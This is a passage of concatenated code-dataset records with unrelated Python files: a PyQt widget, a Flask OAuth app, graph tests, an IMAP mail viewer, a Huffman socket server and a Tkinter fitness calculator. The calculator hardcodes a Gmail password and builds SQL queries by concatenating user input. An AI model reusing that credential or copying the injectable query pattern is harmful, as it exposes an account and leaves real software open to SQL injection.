textWrapper = textwrap.TextWrapper(width = self.innerWidth.measure())\n wrappedTextLines = textWrapper.wrap(text = self.text)\n longestTextLineLength = 0\n\n for line in wrappedTextLines:\n if len(line) > longestTextLineLength:\n longestTextLineLength = len(line)\n\n for i in range(0, min(len(wrappedTextLines), self.innerHeight.measure())):\n vtk.term.moveCursorTo(self.getAbsolutePosition().x + self.paddingLeft.measure(), self.getAbsolutePosition().y + self.paddingTop.measure() + i)\n vtk.term.write(\n self.backgroundColour._render(False) +\n self.foregroundColour._render(True) +\n (\" \" * ((longestTextLineLength - len(wrappedTextLines[i])) // 2)) + wrappedTextLines[i]\n )","sub_path":"build/lib/vtk/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":17003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"354266861","text":"from PyQt5 import QtWidgets, QtGui, QtCore\nfrom PyQt5.QtCore import Qt\nfrom pythontools.gui.object import Object\n\nclass ListWidget(Object):\n\n def __init__(self, window):\n super(ListWidget, self).__init__(window)\n self.obj = QtWidgets.QListWidget(window.window)\n self.obj.setContextMenuPolicy(Qt.CustomContextMenu)\n\n def setContextMenu(self, actions, openOnlyIfItemSelected=True):\n def rightMenuShow():\n if openOnlyIfItemSelected is False or self.getSelectedItem() is not None:\n menu = QtWidgets.QMenu(self.obj)\n for action in actions:\n 
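# attach every caller-supplied QAction to the context menu before it is shown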
menu.addAction(action)\n menu.exec_(QtGui.QCursor.pos())\n\n self.obj.customContextMenuRequested[QtCore.QPoint].connect(rightMenuShow)\n return self\n\n def createContextMenuAction(self, name, function):\n return QtWidgets.QAction(name, self.obj, triggered=function)\n\n def addItem(self, text, icon=None, toolTip=None):\n item = QtWidgets.QListWidgetItem(text)\n if icon is not None:\n item.setIcon(icon)\n if toolTip is not None:\n item.setToolTip(toolTip)\n item.toolTip()\n self.obj.addItem(item)\n return self\n\n def removeItem(self, text, toolTip=None):\n for i in range(self.obj.count()):\n item = self.obj.item(i)\n if item.text() == text and (toolTip is None or item.toolTip() == toolTip):\n self.obj.takeItem(i)\n\n def getSelectedItem(self):\n try:\n return self.obj.selectedItems()[0].text()\n except:\n return None\n\n def clearItems(self):\n self.obj.clear()\n\n def setAcceptDrops(self, bool):\n self.obj.setAcceptDrops(bool)\n return self\n\n def onFileDragEvent(self, function):\n def dragMoveEvent(event):\n if event.mimeData().hasUrls:\n event.setDropAction(Qt.CopyAction)\n event.accept()\n else:\n event.ignore()\n\n self.obj.dragMoveEvent = dragMoveEvent\n\n def dragEnterEvent(event):\n if event.mimeData().hasUrls:\n event.accept()\n else:\n event.ignore()\n\n self.obj.dragEnterEvent = dragEnterEvent\n\n def dropEvent(event):\n if event.mimeData().hasUrls:\n event.setDropAction(Qt.CopyAction)\n event.accept()\n files = []\n for url in event.mimeData().urls():\n files.append(str(url.toLocalFile()))\n function(files)\n else:\n event.ignore()\n\n self.obj.dropEvent = dropEvent\n return self\n\n def onDoubleClick(self, on_double_click):\n self.obj.itemDoubleClicked.connect(on_double_click)\n return self","sub_path":"pythontools/gui/listwidget.py","file_name":"listwidget.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"385991560","text":"from flask import Flask, flash, redirect, url_for, render_template\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import LoginManager, UserMixin, login_user, logout_user,\\\n current_user, session\nfrom oauth import OAuthSignIn\n\n# copy oauthConfig.py.EXAMPLE to oauthConfig.py\n# oauthConfig.py is NOT COMMITTED to the github repo.\n\nimport os\n\n# These you get from the developer pages of Facebook, Twitter and Google.\n# See the README.md for more instructions.\n\noauthIdsAndSecrets = {\n 'facebook': {\n 'id': os.environ['FACEBOOK_APP_ID'],\n 'secret': os.environ['FACEBOOK_APP_SECRET'],\n },\n}\n\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.environ['SESSION_SECRET']\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\napp.config['OAUTH_CREDENTIALS'] = oauthIdsAndSecrets\n\ndb = SQLAlchemy(app)\nlm = LoginManager(app)\nlm.login_view = 'index'\n\n\nclass User(UserMixin, db.Model):\n __tablename__ = 'users'\n id = db.Column(db.Integer, primary_key=True)\n social_id = db.Column(db.String(64), nullable=False, unique=True)\n nickname = db.Column(db.String(64), nullable=False)\n email = db.Column(db.String(64), nullable=True)\n\n\n@lm.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/logout')\ndef logout():\n session.clear() # Added by P Conrad\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/authorize/')\ndef oauth_authorize(provider):\n if not current_user.is_anonymous():\n return 
redirect(url_for('index'))\n oauth = OAuthSignIn.get_provider(provider)\n return oauth.authorize()\n\n\n@app.route('/callback/')\ndef oauth_callback(provider):\n if not current_user.is_anonymous():\n return redirect(url_for('index'))\n oauth = OAuthSignIn.get_provider(provider)\n social_id, username, email = oauth.callback()\n if social_id is None:\n flash('Authentication failed.')\n return redirect(url_for('index'))\n user = User.query.filter_by(social_id=social_id).first()\n if not user:\n user = User(social_id=social_id, nickname=username, email=email)\n db.session.add(user)\n db.session.commit()\n login_user(user, True)\n return redirect(url_for('index'))\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(debug=True)\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"325169949","text":"import socket\n\nphone=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nphone.connect(('127.0.0.1',8080)) # specify the server ip and port\n\nwhile True: \n # msg=input('>>: ').strip() #msg=''\n msg='client11111'#msg=''\n if len(msg) == 0:continue\n phone.send(msg.encode('utf-8'))\n data=phone.recv(1024)\n print(data)\n\n\nphone.close()","sub_path":"day31/基于socketserver实现并发的socket(基于tcp协议)/客户端1.py","file_name":"客户端1.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"281753990","text":"import sys\nimport os\n\ncurrent_path = os.path.dirname(os.path.realpath(__file__))\nparent_path = os.path.abspath(os.path.join(current_path, os.pardir))\nsys.path.append(parent_path)\nsys.path.append(parent_path + '/services/service_spec')\n\n# spec_path = parent_path + '/services/service_spec'\n# print(str(sys.path))\n# sys.path.remove(parent_path)\n# sys.path.remove(spec_path)\n# print(str(sys.path))\n\n\ndef clean_paths():\n sys.path.remove(parent_path)\n sys.path.remove(parent_path + '/services/service_spec')","sub_path":"sentiment-analysis/tests/path_setup.py","file_name":"path_setup.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"310042301","text":"from unittest import TestCase\n\nfrom .graph import Node, Edge, Graph\nfrom .utils import create_graph_from_geo_data, get_lines_intersection_point\n\n\nclass UtilsCase(TestCase):\n def setUp(self) -> None:\n self.data = [[0, 0], [1, 1], [2, 2], [3, 3]]\n\n def test_creating_graph_from_geo_data(self):\n g = create_graph_from_geo_data(self.data)\n self.assertEqual(len(g.nodes), 4)\n self.assertEqual(len(g.edges), 6)\n\n def test_lines_intersection_point(self):\n line1 = ((0, 1), (3, 1))\n line2 = ((1, 0), (1, 3))\n i_point = get_lines_intersection_point(line1, line2)\n self.assertSequenceEqual(i_point, (1, 1))\n\n line1 = ((1, 1), (3, 3))\n line2 = ((2, 2), (4, 4))\n res = get_lines_intersection_point(line1, line2)\n self.assertIsNone(res)\n\n\nclass NodeCase(TestCase):\n def setUp(self) -> None:\n self.node1 = Node(1, (0, 0))\n self.node2 = Node(2, (0, 1))\n\n def test_adding_nodes_return_distance(self):\n distance = self.node1 + self.node2\n self.assertEqual(distance, 1)\n\n\nclass EdgeCase(TestCase):\n def test_edges_could_be_compared(self):\n edge1 = Edge(Node(1, (0, 0)), Node(2, (0, 1)))\n edge2 = Edge(Node(1, (0, 0)), Node(2, (0, 1)))\n self.assertTrue(edge1 == edge2)\n\n edge2 = Edge(Node(1, (0, 0)), Node(2, (0, 10)))\n self.assertFalse(edge1 
== edge2)\n\n\nclass GraphCase(TestCase):\n def setUp(self) -> None:\n self.node1 = Node(1, (0, 1))\n self.node2 = Node(2, (0, 2))\n self.node3 = Node(3, (0, 3))\n\n self.edge1 = Edge(self.node1, self.node2)\n self.edge2 = Edge(self.node2, self.node3)\n self.edge3 = Edge(self.node1, self.node3)\n self.g = Graph()\n\n def test_nodes_should_be_unique(self):\n self.g.add_node(self.node1)\n self.g.add_nodes([self.node1, self.node1])\n self.assertEqual(len(self.g.nodes), 1)\n\n self.g.add_node(self.node2)\n self.g.add_nodes([self.node2, self.node2])\n self.assertEqual(len(self.g.nodes), 2)\n\n def test_edge_should_not_be_added_if_graph_has_not_edge_nodes(self):\n self.g.add_node(self.node1)\n self.g.add_edge(self.edge1)\n self.assertEqual(len(self.g.edges), 0)\n\n self.g.add_node(self.node2)\n self.g.add_edge(self.edge1)\n self.assertEqual(len(self.g.edges), 1)\n\n def test_edges_should_be_unique(self):\n self.g.add_nodes([self.node1, self.node2])\n self.g.add_edge(self.edge1)\n self.g.add_edges([self.edge1, self.edge1])\n self.assertEqual(len(self.g.edges), 1)\n\n def test_edges_are_undirected(self):\n self.g.add_nodes([self.node1, self.node2])\n edge1 = Edge(self.node1, self.node2)\n edge2 = Edge(self.node2, self.node1)\n self.g.add_edges([edge1, edge2, Edge(self.node1, self.node2)])\n self.assertEqual(len(self.g.edges), 1)\n\n def test_connected_nodes(self):\n self.g.add_nodes([self.node1, self.node2, self.node3])\n self.g.add_edges([self.edge1, self.edge2, self.edge3])\n\n c_nodes = self.g.get_connected_nodes(self.node1)\n self.assertEqual(len(c_nodes), 2)\n\n c_nodes = self.g.get_connected_nodes(self.node2)\n self.assertEqual(len(c_nodes), 2)\n\n c_nodes = self.g.get_connected_nodes(self.node3)\n self.assertEqual(len(c_nodes), 2)\n\n def test_graph_to_json(self):\n self.g.add_nodes([self.node1, self.node2, self.node3])\n self.g.add_edges([self.edge1, self.edge2, self.edge3])\n\n json = self.g.json()\n self.assertEqual(len(json.keys()), 3)\n self.assertEqual(len(json[1]), 2)\n self.assertEqual(len(json[2]), 2)\n self.assertEqual(len(json[3]), 2)\n\n def test_graph_to_matrix(self):\n self.g.add_nodes([self.node1, self.node2, self.node3])\n self.g.add_edges([self.edge1, self.edge2, self.edge3])\n\n matrix = self.g.matrix.matrix\n rows, columns = matrix.shape\n self.assertEqual(rows, 3)\n self.assertEqual(columns, 3)\n self.assertSequenceEqual(\n [[0.0, 1.0, 2.0], [1.0, 0.0, 1.0], [2.0, 1.0, 0.0]], matrix.tolist()\n )\n\n def test_sum_of_graphs(self):\n g1 = Graph()\n g2 = Graph()\n g1.add_nodes([self.node1, self.node2])\n g1.add_edges([self.edge1, self.edge2])\n g2.add_nodes([self.node2, self.node3])\n g2.add_edges([self.edge2, self.edge3])\n g = g1 + g2\n\n self.assertEqual(len(g.nodes), 3)\n self.assertEqual(len(g.edges), 2)\n","sub_path":"gedit/graph/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"433677240","text":"# coding: utf-8\n\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404, HttpResponse, HttpResponseForbidden, HttpResponseServerError, HttpResponseRedirect\nfrom django.shortcuts import render_to_response, get_object_or_404, render\nfrom django.template import RequestContext\nfrom django.utils import simplejson\nfrom django.utils.html import escape\nfrom datetime import date, datetime, timedelta\n\nfrom django.conf import settings\nfrom contacts.models import Person\nfrom email.header import decode_header\nfrom email.utils 
import parsedate_tz,mktime_tz\n\nimport imaplib, email, re\nfrom django.utils.translation import ugettext as _\n\n\nlist_response_pattern = re.compile(r'\\((?P<flags>.*?)\\) \"(?P<delimiter>.*)\" (?P<name>.*)')\n\n\ndef parse_list_response(line):\n    \"\"\" Parse '(\\\\HasNoChildren) \"/\" \"INBOX\"'\n        FROM: http://www.doughellmann.com/PyMOTW/imaplib/\n    \"\"\"\n    flags, delimiter, mailbox_name = list_response_pattern.match(line).groups()\n    mailbox_name = mailbox_name.strip('\"')\n    return (flags, delimiter, mailbox_name)\n\ndef get_mail_history(email_address):\n\n    mail_client = imaplib.IMAP4_SSL(settings.EMAIL_IMAP_HOST)\n    mail_client.login(settings.EMAIL_HOST_USER , settings.EMAIL_HOST_PASSWORD)\n\n    if mail_client.state != \"AUTH\":\n        raise Exception (_('Mail login incorrect'))\n\n    # look for the Inbox and All Mail folders\n    inbox_folder = 'INBOX'\n    sent_folder = ''\n    allmail_folder = ''\n\n    for mail_folder in mail_client.list()[1]:\n        flags, delimiter, mailbox_name = parse_list_response(mail_folder)\n        if mailbox_name.lower().find('sent') != -1 or flags.lower().find('sent') != -1:\n            sent_folder = mailbox_name\n        if flags.lower().find('all') != -1:\n            allmail_folder = mailbox_name\n\n    if allmail_folder != '':\n        mail_client.select(allmail_folder)\n        result, message_ids = mail_client.search(None, '(OR (TO \"%s\") (FROM \"%s\"))' % (email_address,email_address))\n        messages = []\n\n        for message_id in message_ids[0].split()[-10:]:\n            result,message_string = mail_client.fetch(message_id, \"(RFC822)\")\n            messages.append(email.message_from_string(message_string[0][1]))\n\n    else:\n        # search both the inbox and the sent folder\n        mail_client.select(inbox_folder)\n        result, message_ids_received = mail_client.search(None, '(FROM \"%s\")' % email_address)\n\n        messages = []\n\n        for message_id in message_ids_received[0].split()[-5:]:\n            result,message_string = mail_client.fetch(message_id, \"(RFC822)\")\n            messages.append(email.message_from_string(message_string[0][1]))\n\n        if sent_folder != '':\n            mail_client.select(sent_folder)\n            result, message_ids_sent = mail_client.search(None, '(TO \"%s\")' % email_address)\n            for message_id in message_ids_sent[0].split()[-5:]:\n                result,message_string = mail_client.fetch(message_id, \"(RFC822)\")\n                messages.append(email.message_from_string(message_string[0][1]))\n\n\n    mail_client.logout()\n    return messages\n\ndef get_message_body(message):\n    for part in message.walk():\n        if part.get_content_type() == 'text/plain':\n            body = part.get_payload(decode=True).decode(part.get_content_charset())\n            if len(body) > 250:\n                body = body[0:250] + ' (...)'\n\n            return body\n    return None\n\ndef decode_message_header(header):\n    result_header, encoding = decode_header(header)[0]\n    try:\n        return result_header.decode(encoding).replace('<','').replace('>','')\n    except:\n        return header.replace('<','').replace('>','')\n\ndef get_message_date(msg_date):\n    date_utc = mktime_tz(parsedate_tz(msg_date))\n    return datetime.fromtimestamp(date_utc).strftime('%Y-%m-%dT%H:%M:%S')\n\ndef mail_history(request, id):\n    \"\"\"Fetch mail history of a contact\n\n    :param id: contact id.\n    \"\"\"\n    results = []\n\n    if not request.user.is_authenticated():\n        results = {'error' : True, 'error_message' : _('User is not authenticated')}\n        json = simplejson.dumps(results)\n        return HttpResponse(json, mimetype='application/json')\n    try:\n        person = Person.objects.get(id=id)\n    except Person.DoesNotExist:\n        results = {'error' : True, 'error_message' : _('Person does not exist in database')}\n        json = simplejson.dumps(results)\n        return HttpResponse(json, mimetype='application/json')\n\n    
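    # get_mail_history() may raise (IMAP login or connection failures), so the
    # call below is wrapped and any error is returned in the same JSON error
    # envelope as the other failure paths above.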
try:\n result_messages = get_mail_history(person.email_address)\n except Exception as e:\n results = {'error' : True, 'error_message' : str(e)}\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n\n results = {'error' : False, 'messages' : [ {'from' : decode_message_header(message['From']), 'subject': decode_message_header(message['Subject']),'date': get_message_date(message['Date']),'body' : get_message_body(message) } for message in result_messages ]}\n json = simplejson.dumps(results)\n return HttpResponse(json, mimetype='application/json')\n","sub_path":"contacts/views/mailhistory.py","file_name":"mailhistory.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"399126765","text":"import pytest\nimport tango\nfrom ska_tango_base.commands import ResultCode\nfrom ska_tmc_common.dev_factory import DevFactory\n\nfrom tests.settings import (\n SDP_SUBARRAY_DEVICE_LOW,\n SDP_SUBARRAY_DEVICE_MID,\n SDP_SUBARRAY_LEAF_NODE_LOW,\n SDP_SUBARRAY_LEAF_NODE_MID,\n event_remover,\n logger,\n)\nfrom tests.ska_tmc_sdpsubarrayleafnode.integration.common import tear_down\n\n\ndef on_command(\n tango_context, sdpsaln_fqdn, sdpsa_fqdn, change_event_callbacks\n):\n logger.info(\"%s\", tango_context)\n dev_factory = DevFactory()\n sdp_subarray_ln_proxy = dev_factory.get_device(sdpsaln_fqdn)\n sdp_subarray_proxy = dev_factory.get_device(sdpsa_fqdn)\n try:\n sdp_subarray_ln_proxy.subscribe_event(\n \"longRunningCommandsInQueue\",\n tango.EventType.CHANGE_EVENT,\n change_event_callbacks[\"longRunningCommandsInQueue\"],\n )\n change_event_callbacks[\n \"longRunningCommandsInQueue\"\n ].assert_change_event(\n None,\n )\n result, unique_id = sdp_subarray_ln_proxy.On()\n change_event_callbacks[\n \"longRunningCommandsInQueue\"\n ].assert_change_event(\n (\"On\",),\n )\n logger.info(f\"Command ID: {unique_id} Returned result: {result}\")\n assert result[0] == ResultCode.QUEUED\n sdp_subarray_ln_proxy.subscribe_event(\n \"longRunningCommandResult\",\n tango.EventType.CHANGE_EVENT,\n change_event_callbacks[\"longRunningCommandResult\"],\n )\n change_event_callbacks[\"longRunningCommandResult\"].assert_change_event(\n (unique_id[0], str(int(ResultCode.OK))),\n lookahead=2,\n )\n\n change_event_callbacks[\n \"longRunningCommandsInQueue\"\n ].assert_change_event(\n None,\n lookahead=2,\n )\n event_remover(\n change_event_callbacks,\n [\"longRunningCommandResult\", \"longRunningCommandsInQueue\"],\n )\n tear_down(dev_factory, sdp_subarray_proxy, sdp_subarray_ln_proxy)\n except Exception as e:\n tear_down(dev_factory, sdp_subarray_proxy, sdp_subarray_ln_proxy)\n raise Exception(e)\n\n\n@pytest.mark.post_deployment\n@pytest.mark.SKA_mid\ndef test_on_command_mid(tango_context, change_event_callbacks):\n on_command(\n tango_context,\n SDP_SUBARRAY_LEAF_NODE_MID,\n SDP_SUBARRAY_DEVICE_MID,\n change_event_callbacks,\n )\n\n\n@pytest.mark.post_deployment\n@pytest.mark.SKA_low\ndef test_on_command_low(tango_context, change_event_callbacks):\n on_command(\n tango_context,\n SDP_SUBARRAY_LEAF_NODE_LOW,\n SDP_SUBARRAY_DEVICE_LOW,\n change_event_callbacks,\n )\n","sub_path":"tests/ska_tmc_sdpsubarrayleafnode/integration/test_on_command.py","file_name":"test_on_command.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"199479087","text":"from TreeNode import TreeNode\nimport heapq\nimport json\nimport 
socket\n\nclass Huffman:\n def __init__(self):\n self.text = None\n self.codedText = None\n self.frequencies = {}\n self.heapNodes = []\n self.coddedLetters = {}\n self.reversedCoddedLetters = {}\n self.numberZeros = 0\n\n def calculateFrequencies(self, pathToText):\n file = open(pathToText, 'r')\n self.text = file.read()\n file.close()\n for letter in self.text:\n if letter in self.frequencies:\n self.frequencies[letter] += 1\n else:\n self.frequencies[letter] = 1\n\n def buildHuffmanTree(self):\n [heapq.heappush(self.heapNodes, TreeNode(letter, self.frequencies[letter])) for letter in self.frequencies]\n\n while self.heapNodes.__len__() > 1:\n smallestNodes = [heapq.heappop(self.heapNodes) for i in range(2)]\n heapq.heappush(self.heapNodes, TreeNode(None, smallestNodes[0].frequency + smallestNodes[1].frequency,\n smallestNodes[0], smallestNodes[1]))\n\n def calculateCodedLetters(self, code, node):\n if node.letter is not None:\n self.coddedLetters[node.letter] = code\n return\n self.calculateCodedLetters(code + \"0\", node.leftNode)\n self.calculateCodedLetters(code + \"1\", node.rightNode)\n\n def getCodedText(self):\n encodedText = \"\"\n for letter in self.text:\n encodedText += self.coddedLetters[letter]\n return encodedText\n\n def compressFile(self, pathToText, pathToCode, pathToDict):\n self.calculateFrequencies(pathToText)\n self.buildHuffmanTree()\n self.calculateCodedLetters(\"\", heapq.heappop(self.heapNodes))\n file = open(pathToDict, 'w')\n file.write(json.dumps(self.coddedLetters, indent=2))\n file.close()\n self.codedText = self.getCodedText()\n self.numberZeros = 0\n for i in range(8 - self.codedText.__len__() % 8):\n self.codedText += '0'\n self.numberZeros += 1\n\n bytes = bytearray()\n for i in range(0, len(self.codedText), 8):\n byte = self.codedText[i:i + 8]\n bytes.append(int(byte, 2))\n file = open(pathToCode, 'wb')\n file.write(bytes)\n file.close()\n\n def decodeText(self, codedText):\n code = \"\"\n decodedText = \"\"\n for i in codedText:\n code += i\n if code in self.reversedCoddedLetters:\n decodedText += self.reversedCoddedLetters[code]\n code = \"\"\n return decodedText\n\n def decompressFile(self, pathToCode, pathToDecode, pathToDict):\n self.coddedLetters = json.loads(open(pathToDict).read().replace(\"}{\", \"},{\"))\n self.reversedCoddedLetters = {value: key for (key, value) in self.coddedLetters.items()}\n with open(pathToCode, 'rb') as fileInput, open(pathToDecode, 'w') as fileOutput:\n code = \"\"\n\n byte = fileInput.read(1)\n while (len(byte) > 0):\n code += bin(ord(byte))[2:].rjust(8, '0')\n byte = fileInput.read(1)\n codedText = code[:code.__len__() - self.numberZeros]\n decodedText = self.decodeText(codedText)\n file = open(pathToDecode, 'w')\n file.write(decodedText)\n file.close()\n\n\nh = Huffman()\nh.compressFile('text2.txt', 'textbin.txt', 'dict.txt')\nh.decompressFile('textbin.txt', 'decodedText.txt', 'dict.txt')\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((socket.gethostname(), 1234))\ns.listen(5)\n\nprint('Server listening....')\n\nwhile True:\n conn, addr = s.accept()\n print('Got connection from', addr)\n conn.send(bytes(str(h.numberZeros), \"utf-8\"))\n\n file = open('textbin.txt', 'rb')\n l = file.read(8)\n while (l):\n conn.send(l)\n print('Sent ',repr(l))\n l = file.read(8)\n file.close()\n\n conn.send(bytes('EOF', 'utf-8'))\n\n file = open('dict.txt','rb')\n l = file.read(8)\n while (l):\n conn.send(l)\n print('Sent ',repr(l))\n l = file.read(8)\n file.close()\n\n print('Done sending')\n 
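    # closing the per-client socket ends this transfer; the outer while True
    # loop then blocks on s.accept() until the next client connects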
conn.close()","sub_path":"huffman-server/HuffmanServer.py","file_name":"HuffmanServer.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"310135778","text":"# FRIEND OR FOE? #InspiredByCodewars\n# Make a program that filters a list of strings and returns a list with only your friends name in it.\n# If a name has exactly 4 letters in it, you can be sure that it has to be a friend of yours!\n# Otherwise, you can be sure he's not...\n# Example:\n# Input = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]\n# Output = {\"Ryan\":\"friend\", \"Kieran\":\"foe\", \"Jason\":\"foe\", \"Yous\":\"friend\"}\n\ninput = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]\nfilter = {name:\"friend\" if len(name) == 4 else \"foe\" for name in input}\nprint(filter)\n\n","sub_path":"comprehensions/dev_exercises/elijah.py","file_name":"elijah.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"99280094","text":"import datetime\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom tkinter.font import Font\r\nimport sqlite3\r\nimport CenterWindow\r\nimport smtplib\r\n\r\n\r\ndef about():\r\n root = Tk()\r\n root.title('About Fitness Calculator')\r\n CenterWindow.center_window(root, 600, 400)\r\n frame1 = Frame(root, bg='gold')\r\n frame1.pack(fill=X)\r\n\r\n abt = \"\"\"The main objective of this project is to provide proper Fitness details to the students and faculty of the university.\\nThis project tells us about how fit a person is. \\nA proper way of getting details about the health of the user will keep the user updated about his \\nhealth and he will get a quick check up if he is having any disease or not.\r\n \\nThis interface will provide the user to input his details and will get a proper report of his health.\\n\r\n Our prime motive is if the patient is not well, he will come to know about his illness and get a proper \\ntreatment on time. 
\\nWith this a precious life can be saved.\r\n \"\"\"\r\n\r\n Label(frame1, text='Fitness Calculator', bg='gold', font=\"Verdana 20 bold\").pack()\r\n Label(frame1, text='v0.1', bg='green', fg='white', font=\"Verdana 10 bold\").pack()\r\n\r\n frame2 = Frame(root, bg='powder blue')\r\n frame2.pack(fill=BOTH, expand=1)\r\n\r\n Label(frame2, text=abt, bg='orange').pack()\r\n\r\n frame3 = Frame(root, bg='White')\r\n frame3.pack(fill=BOTH, expand=1)\r\n Label(frame3, text='Front-End Developer: Aman Deep', bg='powder blue', font=\"Verdana 10 bold\").place(x=200, y=20)\r\n Label(frame3, text='Back-End Developer: Sitesh Roy', bg='powder blue', font=\"Verdana 10 bold\").place(x=200, y=40)\r\n Label(frame3, text='Design: Basit Manzoor', bg='powder blue', font=\"Verdana 10 bold\").place(x=200, y=60)\r\n\r\n\r\ndef history():\r\n global name, email\r\n root = Tk()\r\n root.title('Enter details')\r\n CenterWindow.center_window(root, 650, 200)\r\n\r\n frame1 = Frame(root, bg='gold')\r\n frame1.pack(fill=X)\r\n\r\n Label(frame1, text='Check your History', bg='gold', font=\"Verdana 10 bold\").pack()\r\n\r\n frame2 = Frame(root, bg='powder blue')\r\n frame2.pack(fill=BOTH, expand=1)\r\n\r\n Label(frame2, text='Name', font=\"Verdana 20\", bg='powder blue').grid(row=1, column=7, padx=10, pady=10)\r\n name = Entry(frame2, width=15, font=\"Verdana 20\")\r\n name.grid(row=1, column=8, padx=10, pady=10, ipady=5)\r\n\r\n Label(frame2, text='Email', font=\"Verdana 20\", bg='powder blue').grid(row=2, column=7, padx=10, pady=10)\r\n email = Entry(frame2, width=15, font=\"Verdana 20\")\r\n email.grid(row=2, column=8, padx=10, pady=10, ipady=5)\r\n\r\n Button(frame2, text='Show Details', bg='green', fg='white', command=showdetails, font=\"Verdana 10\").grid(row=3,\r\n column=8,\r\n padx=10,\r\n pady=10)\r\n Button(frame2, text='Back', bg='red', fg='white', command=root.destroy, font=\"Verdana 10\").grid(row=3, column=1,\r\n padx=10, pady=10)\r\n\r\n\r\ndef send_mail():\r\n sender = \"siteshroy786@gmail.com\"\r\n receiver = set_email.get()\r\n password = \"SITESHROY2018\"\r\n mail_con = smtplib.SMTP(\"smtp.gmail.com\", 587)\r\n mail_con.starttls()\r\n mail_con.login(sender, password)\r\n\r\n msg = \"\"\"From: Fitness Calculator <%s>\r\n To: %s <%s>\r\n Subject: Fitness Report\r\n\r\n Name: %s\r\n Age: %s\r\n Email: %s\r\n Weight: %s\r\n Height: %s\r\n BP: %s\r\n Pulse rate: %s\r\n RBC count: %s\r\n WBC count: %s\r\n Platelets: %s\r\n HB: %s\r\n Uric acid: %s\r\n Cholestrol: %s\r\n Report Date: %s\r\n\r\n \"\"\" % (sender, full_name.get(), set_email.get(), full_name.get(), age_val.get(), set_email.get(), weight_val.get(),\r\n height_val.get(), bp_val.get(), pulse_rate_val.get(), rbc_count_val.get(), wbc_count_val.get(),\r\n platelets_val.get(), hb_val.get(), uric_acid_val.get(), cholesterol_val.get(), set_date.get())\r\n\r\n mail_con.sendmail(sender, receiver, msg)\r\n mail_con.quit()\r\n\r\n\r\ndef showdetails():\r\n cnx = sqlite3.connect('data.db')\r\n cursor = cnx.cursor()\r\n data = cursor.execute(\"SELECT * FROM report WHERE fullname='\" + name.get() + \"' and email='\" + email.get() + \"'\")\r\n\r\n root = Tk()\r\n root.title('History about ' + name.get())\r\n listbox = Listbox(root, width=60, height=20)\r\n listbox.pack()\r\n\r\n for i in data:\r\n print(i)\r\n listbox.insert(END, 'Name = ' + i[0])\r\n listbox.insert(END, 'Age = ' + i[1])\r\n listbox.insert(END, 'Email = ' + i[2])\r\n listbox.insert(END, 'Weight = ' + i[3])\r\n listbox.insert(END, 'Height = ' + i[4])\r\n listbox.insert(END, 'BP = ' + i[5])\r\n 
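        # each row tuple i follows the column order of the INSERT statement in
        # save_database(): indexes 6-13 are pulse rate through report date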
listbox.insert(END, 'Pulse rate = ' + i[6])\r\n        listbox.insert(END, 'RBC count = ' + i[7])\r\n        listbox.insert(END, 'WBC count = ' + i[8])\r\n        listbox.insert(END, 'Platelets = ' + i[9])\r\n        listbox.insert(END, 'HB = ' + i[10])\r\n        listbox.insert(END, 'Uric acid = ' + i[11])\r\n        listbox.insert(END, 'Cholestrol = ' + i[12])\r\n        listbox.insert(END, 'Report Date = ' + i[13])\r\n        listbox.insert(END, '\\n\\n**********************************************************')\r\n\r\n    cnx.commit()\r\n    cursor.close()\r\n    cnx.close()\r\n\r\n\r\ndef call_bmi():\r\n    weight_val1 = weight_val.get()\r\n    height_val1 = ((height_val.get()) / 100)\r\n\r\n    try:\r\n        bmi_val = (weight_val1) / (height_val1 * height_val1)\r\n        return str(round(bmi_val, 2))\r\n\r\n    except ZeroDivisionError:\r\n        bmi_val = 0\r\n        return str(bmi_val)\r\n\r\n\r\ndef BMI_catg():\r\n    # call_bmi() returns a string and BMI is fractional, so compare as float\r\n    # (a string can never be \"in\" a range, which made every input '(Obese)')\r\n    x = float(call_bmi())\r\n    if x < 19:\r\n        return '(Underweight)'\r\n    elif 25 <= x < 31:\r\n        return '(Overweight)'\r\n    elif 19 <= x < 25:\r\n        return '(Healthy weight)'\r\n    else:\r\n        return '(Obese)'\r\n\r\n\r\ndef call_me():\r\n    top = Toplevel()\r\n    top.geometry(\"500x500+150+150\")\r\n    top.title('Confirm')\r\n\r\n    label = Label(top, 